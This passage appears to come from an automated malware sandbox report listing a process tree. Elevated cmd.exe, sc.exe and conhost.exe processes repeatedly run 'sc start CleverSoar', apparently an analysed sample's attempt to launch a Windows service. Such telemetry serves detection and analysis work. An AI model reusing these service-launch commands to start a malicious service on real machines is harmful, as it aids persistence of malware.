                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:18
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:19
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:20
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:22
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:24
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:30
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:33
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:34
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:35
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:36
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:37
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:38
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:39
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:40
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:41
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:42
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:43
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:44
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:45
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:46
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:47
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:48
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:49
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:50
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:51
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:52
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:53
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:54
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:55
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:56
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:57
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:58
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:59
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:60
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:61
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:62
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:63
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:64
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:65
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:66
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:67
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:68
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:69
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:70
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:71
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:72
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:73
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:74
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:75
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:76
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:77
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:78
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:79
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:80
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:81
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:82
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:83
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:84
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:85
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:86
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:87
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
